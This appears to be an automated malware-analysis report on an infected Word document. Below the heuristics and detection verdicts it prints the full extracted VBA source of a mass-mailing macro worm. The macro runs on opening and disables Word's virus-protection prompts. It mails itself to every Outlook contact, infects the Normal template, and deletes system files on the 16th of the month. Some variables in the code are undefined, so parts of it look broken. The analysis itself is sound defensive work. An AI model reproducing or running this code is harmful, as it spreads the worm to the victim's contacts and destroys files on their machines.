MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute upon opening, disabling security features and attempting to send itself as an email attachment to contacts via Outlook. The macro also attempts to modify the system registry to avoid re-execution prompts. The presence of VBA macros and the behavior of disabling security settings strongly suggest a worm-like functionality, consistent with the ClamAV detection of Win.Worm.Merlin-6.
Heuristics 5
-
ClamAV: Win.Worm.Merlin-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Merlin-6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3575 bytes |
SHA-256: dbd7b38e3cc203ba06d19f32af2e25ffcc78b1cb1bfaec956b69fd86563a7f4e |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'VBS.Eva@mm
Private Sub Document_Open()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Options.SavePropertiesPrompt = False
Dim Address, NumOfContacts, Counter, EmailItem, ContactNumber
Dim Outlook: Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
If System.PrivateProfileString("", "HKCU\Software\Eva\Macro", "") <> "oui" Then
Dim Mapi: Set Mapi = Outlook.GetNameSpace("MAPI")
Dim MapiAdList: Set MapiAdList = Mapi.AddressLists
For Each Address In MapiAdList
If Not Address.AddressEntries.Count = 0 Then
NumOfContacts = Address.AddressEntries.Count
For Counter = 1 To NumOfContacts
Set ContactNumber = Address.AddressEntries(Counter)
Set EmailItem = Outlook.CreateItem(0)
EmailItem.To = ContactNumber.Address
EmailItem.Subject = "Some News"
EmailItem.Body = "I´ve got some news for you!"
EmailItem.Attachments.Add ActiveDocument.FullName
EmailItem.DeleteAfterSubmit = True
EmailItem.Importance = ImportanceHigh
EmailItem.Send
Next
System.PrivateProfileString("", "HKCU\Software\Eva\", "Macro") = "oui"
End If
Next
Dim ADocument: Set ADocument = ActiveDocument.VBProject.VBComponents.Item(1)
Dim NTemplate: Set NTemplate = NormalTemplate.VBProject.VBComponents.Item(1)
NTemplateLines = NTemplate.CodeModule.CountOfLines
ADocumentLines = ADocument.CodeModule.CountOfLines
Counter = 2
If ADocument.Name <> "'VBS.Eva@mm" Then
If ADocumentLines > 0 Then
ADocument.CodeModule.DeleteLines 1, ADocumentLines
Set InfectFile = ADocument
ADocument.Name = "'VBS.Eva@mm"
DoADocument = True
End If
If NTemplate.Name <> "'VBS.Eva@mm" Then
If NTemplateLines > 0 Then
NTemplate.CodeModule.DeleteLines 1, NTemplateLines
Set InfectFile = NTemplate
NTemplate.Name = "'VBS.Eva@mm"
DoNTemplate = True
End If
If DoNTemplate = True Then
Do While ADocument.CodeModule.Lines(1, 1) = ""
ADocument.CodeModule.DeleteLines 1
Loop
InfectFile.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADocument.CodeModule.Lines(BGN, 1) <> ""
NTemplate.CodeModule.InsertLines BGN, ADocument.CodeModule.Lines(BGN, 1)
Counter = Counter + 1
Loop
End If
If DoADocument = True Then
Do While NTemplate.CodeModule.Lines(1, 1) = ""
NTemplate.CodeModule.DeleteLines 1
Loop
InfectFile.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTemplate.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTemplate.CodeModule.Lines(BGN, 1)
Counter = Counter + 1
Loop
End If
If Day(Now) = 16 Then
fso.DeleteFile ("C:\command.com")
fso.DeleteFile ("C:\win.com")
MsgBox "That´s it!"
End If
If NTemplateLines <> 0 And ADocumentLines = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.